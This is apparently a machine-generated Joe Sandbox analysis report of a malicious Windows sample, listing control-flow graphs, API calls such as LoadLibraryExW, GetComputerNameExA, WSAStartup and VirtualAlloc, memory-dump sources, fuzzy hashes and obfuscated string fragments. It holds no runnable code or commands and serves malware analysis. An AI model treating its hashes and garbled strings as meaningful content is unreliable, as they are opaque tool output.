control_flow_graph 1101 3e9d1e-3e9d34 1102 3e9d40-3e9d52 1101->1102 1102->1102 1103 3e9d54-3e9d7e 1102->1103 1104 3e9d80-3e9d92 1103->1104 1104->1104 1105 3e9d94-3e9e13 LoadLibraryExW call 41d960 1104->1105 1108 3e9e20-3e9e32 1105->1108 1108->1108 1109 3e9e34-3e9e5e 1108->1109 1110 3e9e60-3e9e72 1109->1110 1110->1110 1111 3e9e74-3e9e80 LoadLibraryExW call 41d960 1110->1111 1113 3e9e85-3e9e98 1111->1113
APIs
• LoadLibraryExW.KERNEL32(?,00000000), ref: 003E9D98
• LoadLibraryExW.KERNEL32(?,00000000), ref: 003E9E78
Memory Dump Source
• Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: LibraryLoad
• String ID: CKG

Control-flow Graph
control_flow_graph 1114 40d7ee-40d7f3 1115 40d813-40d819 1114->1115 1116 40d7f5-40d7f9 1114->1116 1118 40d896-40dbfb FreeLibrary call 41fe00 1115->1118 1117 40d800-40d809 1116->1117 1117->1117 1119 40d80b-40d80e 1117->1119 1123 40dc00-40dc12 1118->1123 1119->1118 1123->1123 1124 40dc14-40dc19 1123->1124 1125 40dc1b-40dc1f 1124->1125 1126 40dc2d 1124->1126 1127 40dc20-40dc29 1125->1127 1128 40dc30-40dc72 GetComputerNameExA 1126->1128 1127->1127 1129 40dc2b 1127->1129 1129->1128
APIs
• FreeLibrary.KERNEL32(?), ref: 0040D898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0040DC43
Memory Dump Source
• Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
Similarity
• API ID: ComputerFreeLibraryName
• String ID: ;87>
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 003EF09D
Memory Dump Source
• Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a35c0683f494b1d6612ae94b0941688379b9fa84bc61cb0b06a1905a3233b81
                                                                                                                                                                                                                                                                • Instruction ID: 5fcc647c95aedc99aeef206629772eeb067026c73d1b982d1e7fa05dd79762ae
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a35c0683f494b1d6612ae94b0941688379b9fa84bc61cb0b06a1905a3233b81
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D341D8B4910B40AFD370EF3D994B7137EB8AB05250F504B1EF9EA866D4E231A4198BD7
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0040DD03
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ComputerName
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3545744682-0
                                                                                                                                                                                                                                                                • Opcode ID: 22c2b97a0e3656c49e56ff3915d779c699a25034ea094c46600f3824519f0cf5
                                                                                                                                                                                                                                                                • Instruction ID: 9bc9d3989f2931102bcc11af4316d2a08de68643a03c4fb0dd6966bf59ce211a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22c2b97a0e3656c49e56ff3915d779c699a25034ea094c46600f3824519f0cf5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C321C7705087918BE7258B24C460732BBE1BF5B304F1885DED4D39B782CA78A446C766
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlReAllocateHeap.NTDLL(?,00000000), ref: 0041E0E0
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: 79942e0ae7b7fd83abcb9962e7566e4e5324f1d8dc3d019521915141d9925f84
                                                                                                                                                                                                                                                                • Instruction ID: b3e9e8cf49489420653d487da4a856539fb3a2a869165b0f64d876ec9286bac7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79942e0ae7b7fd83abcb9962e7566e4e5324f1d8dc3d019521915141d9925f84
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF0EC75524231FBC3103F35BD05A973A65EFC7710F46043AF40456120DB78DC57859A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 003EECA2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeSecurity
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 640775948-0
                                                                                                                                                                                                                                                                • Opcode ID: 2fe41a125ae2e2b53886a869994b91e079ae6451d625c077529d83772e4971fb
                                                                                                                                                                                                                                                                • Instruction ID: 4f432b557978ba08edb07b7cc428b0ebe6601786debbefd1a476b761117b21fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2fe41a125ae2e2b53886a869994b91e079ae6451d625c077529d83772e4971fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87E092343EA3427AF6B986149C63F65A1169B42F35F706318B7213E3D4CAE03102400D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BlanketProxy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3890896728-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 003E9ED2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Startup
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 724789610-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,00000000,?,0041E0F9), ref: 0041C590
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                • Opcode ID: cbfbbdb66ed44276ee2861b8c13716e9fa1781eb1df179db539da1619fd76e2a
                                                                                                                                                                                                                                                                • Instruction ID: 74b49eca21872e81413053d509b91f93d85bf0514c30bb56d7d0c5bdb1ee04ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbfbbdb66ed44276ee2861b8c13716e9fa1781eb1df179db539da1619fd76e2a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4D01231515132FBC6103F28BC06BCB3B94EF49320F0708A1F504AA074C764EC92CAD8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 0041C561
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: d000aadc7a5bf7a9c446b9063edb3d64233d0f416ffae42e437b1145870e8581
                                                                                                                                                                                                                                                                • Instruction ID: b3866039d7872d56e5ca8e8c5aac60e0bc4dd4a0ee4263e8688ffc65fe8c6553
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d000aadc7a5bf7a9c446b9063edb3d64233d0f416ffae42e437b1145870e8581
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49A00271184210DFDA562F24FD0AFC47B21EF58721F1351A1F101590F6C7B2DC92DA88
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 00439AD9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 6a48b079e76c774bef598e18d679ec5c55c7e31c20ec70b3e59bc242ae236d02
                                                                                                                                                                                                                                                                • Instruction ID: 495bda3ebe7b40bca5633a7038eadfc76050ff8e2d1152acfd6af909354f1e32
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a48b079e76c774bef598e18d679ec5c55c7e31c20ec70b3e59bc242ae236d02
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BF0F4B010CA04DFEB097F18D89167DBBE0EF48700F12092EEAC287790E6355890DB4B
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000), ref: 0043A553
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                • Opcode ID: 22a0659eb249e855ca052ed4887fe28f47a3cd9c5f28f4265d027ffdd3048294
                                                                                                                                                                                                                                                                • Instruction ID: a72415683d738976694720388d67df0f88fc10784aa70ac4c14470258d2fbdef
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22a0659eb249e855ca052ed4887fe28f47a3cd9c5f28f4265d027ffdd3048294
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFF08C7298C305DBC7005F79C88825EF7A0FF68760F29861EAA9583650D67A4C61CF07
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004043AA
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0040443E
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: +$e$+$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE@$Xs$bF@$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                                • API String ID: 237503144-2395656424
                                                                                                                                                                                                                                                                • Opcode ID: 50f24ebb28f5440a40d9d41e0f63b2f26d563196d075d476a9e8df94b74976a1
                                                                                                                                                                                                                                                                • Instruction ID: c966f4ac8f427b21cc70baf88be12c6d964f665952b6ed88dba65ffd14d98ff6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50f24ebb28f5440a40d9d41e0f63b2f26d563196d075d476a9e8df94b74976a1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1C21CB560D3848AD334CF14D452B9FBBF2FB82300F00892DD5E96B255D7B5864A8B9B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: +$e$ n l$%r?p$<j:h$=:$DD$N~4|$RE@$Xs$bF@$e>n<$gd$r:i8$ut$13$=?$b`$tj$uw$y{$|r
                                                                                                                                                                                                                                                                • API String ID: 0-331053651
                                                                                                                                                                                                                                                                • Opcode ID: 6ef19ac2d80e48a90fff625b1a33ab107428725706407653a6da9defb3075a89
                                                                                                                                                                                                                                                                • Instruction ID: e1c64604b33326bc4d9a732705f32018b3092db26ee44f6aca2e79f99823800f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6ef19ac2d80e48a90fff625b1a33ab107428725706407653a6da9defb3075a89
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70C20DB560D3848AE334CF54C442BDFBAF2FB82304F00892DD5E96B255D7B5464A8B9B
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: *,-"$3F&D$JyTK$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$L4$L4
                                                                                                                                                                                                                                                                • API String ID: 0-2746398225
                                                                                                                                                                                                                                                                • Opcode ID: 192f4247362966952d2b210b3de79650a8c7503379f0fe9f981055f4b2dad4d2
                                                                                                                                                                                                                                                                • Instruction ID: bd9de707c4de603cf13fbe7795a2b408e500853a39148aaec991456afe2e02fb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192f4247362966952d2b210b3de79650a8c7503379f0fe9f981055f4b2dad4d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C14225726083558FC7358F28D8927ABB7E2FBD5314F1A893CD5D98B256D7348806CB82
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                                • API String ID: 0-3116432788
                                                                                                                                                                                                                                                                • Opcode ID: fdb731dce458282b25899f53a885c32a4f6576c3df97543239f0d9f1c5c68d1a
                                                                                                                                                                                                                                                                • Instruction ID: 8e52a54be5aae6dc4f2aa87f9c8f81982f39ce939fa86df3e1abcf4da3734829
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdb731dce458282b25899f53a885c32a4f6576c3df97543239f0d9f1c5c68d1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A98236716083518BC725CF28C8917BBB7E2FFC9314F198A6DE9D59B2A5E7348806C742
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: ;"I$,6.2$A$FM$PTvu$WAg.$cbrn
                                                                                                                                                                                                                                                                • API String ID: 0-3116088196
                                                                                                                                                                                                                                                                • Opcode ID: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                                • Instruction ID: 61d6191d295f1d389c4818539fb4cd74b802cc860fe825ecc8b66283111068ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9e207116f0d0e1d3c010b878aae285ff6d7d53aed98aae9b503113e93668ba5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5C126B160C3D58BD322CF6A94A035BFFD19FD7210F094AADE4D51B386D275890ACB92
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: vv$/+b$6A$_Po^$|}?
                                                                                                                                                                                                                                                                • API String ID: 0-1440487632
                                                                                                                                                                                                                                                                • Opcode ID: cc0c77a8679daede51d710f9df775b983b0a14aa419135f898a09819cf59e05a
                                                                                                                                                                                                                                                                • Instruction ID: cc62bf496ab48f45acb6289ea8b9d5eabfa76372a319c34821755fae5c027efe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc0c77a8679daede51d710f9df775b983b0a14aa419135f898a09819cf59e05a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33B2F4F3A0C2049FD304AF29EC8563AFBE9EF94720F16893DE6C587744EA3558448697
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004084BD
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004085B4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                                • Opcode ID: 996039f15eceed9c429293725d3ca5cbcd0b7da26ab01bfa7e2660e6506d5003
                                                                                                                                                                                                                                                                • Instruction ID: 6d14fba03144a2aa18385f5b1a5c2d2495b2f551cd60598e62a4535f32014722
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 996039f15eceed9c429293725d3ca5cbcd0b7da26ab01bfa7e2660e6506d5003
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA220071A08381CFD3248F28D88172FBBE1BF85320F194A7DE995573A1D7359912CB9A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 004084BD
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 004085B4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: LF7Y$_^]\
                                                                                                                                                                                                                                                                • API String ID: 237503144-3688711800
                                                                                                                                                                                                                                                                • Opcode ID: 710523a206aeac1454465f3554c1dfff8e2600b9fb6403177839a509b445338b
                                                                                                                                                                                                                                                                • Instruction ID: 3d51d657d49a94c1703a572ce1d6e72d610f40dc27635ad8bdd7e55f6f3a1d5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 710523a206aeac1454465f3554c1dfff8e2600b9fb6403177839a509b445338b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E12F171A08381CFD7248F28D88171BBBE1BF85310F194A7DE9D96B3A1D7359902CB96
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: "_,Y$.[TU$;GsA$=K0E$pCj]
                                                                                                                                                                                                                                                                • API String ID: 0-1171452581
                                                                                                                                                                                                                                                                • Opcode ID: 911c2eded715812e8f90166cfb47f05dcd1507888977cf4892151d023dbb2201
                                                                                                                                                                                                                                                                • Instruction ID: ae98e4f4e26227a805bd0bc513abf8a3f790f5e9c9758ab25f31fcea83a25335
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 911c2eded715812e8f90166cfb47f05dcd1507888977cf4892151d023dbb2201
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B89113B16083009BC720DF24C895B67B7B5EF85318F14892DF9899B3C1E3B9D906C75A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 2h?n$7$SP$^`/4$gfff
                                                                                                                                                                                                                                                                • API String ID: 0-3257051659
                                                                                                                                                                                                                                                                • Opcode ID: 16ae58258520342e596a30300cd34cf8cb70c636570e4c12a4d7bee02db37a58
                                                                                                                                                                                                                                                                • Instruction ID: 2cce882ca275d6882438546bfd21de4e5a15b277147a3c6a06e135c6dfcc6918
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16ae58258520342e596a30300cd34cf8cb70c636570e4c12a4d7bee02db37a58
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57A14876A143508BD728CF28DC5176FB7D2FBC4318F5A8A3DD585DB3A1DA3898068781
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 9deZ$eb$sp${s
                                                                                                                                                                                                                                                                • API String ID: 0-3993331145
                                                                                                                                                                                                                                                                • Opcode ID: ac4ffd6ae05c15c8212d6c69b0aca419959ba7b321130c00f5d6a115418b9d9c
                                                                                                                                                                                                                                                                • Instruction ID: 6458466d85c6ffe98ff568997d56b8937b2eeb3eccf141fc30c31ab26a00cdc1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac4ffd6ae05c15c8212d6c69b0aca419959ba7b321130c00f5d6a115418b9d9c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47D1F4B16183148BC728DF24C8A166BB7F2FFD1354F089A2DE4969B3A0E7789904C756
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 004091DA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                                • String ID: +Ku$wpq
                                                                                                                                                                                                                                                                • API String ID: 237503144-1953850642
                                                                                                                                                                                                                                                                • Opcode ID: b9f43b2606bcacedb1b5ec1aeaf9004db3313775fb5074090241fea00bdb5ec7
                                                                                                                                                                                                                                                                • Instruction ID: 745aec20b7dc2cf1c221fb37dcce27eedce6e330906c57cd06949b9ae9d812c9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9f43b2606bcacedb1b5ec1aeaf9004db3313775fb5074090241fea00bdb5ec7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E51BD7221C3518FC324CF29984076FB7E2EBC5310F55892EE499CB2C5DB34D90A8B92
                                                                                                                                                                                                                                                                APIs
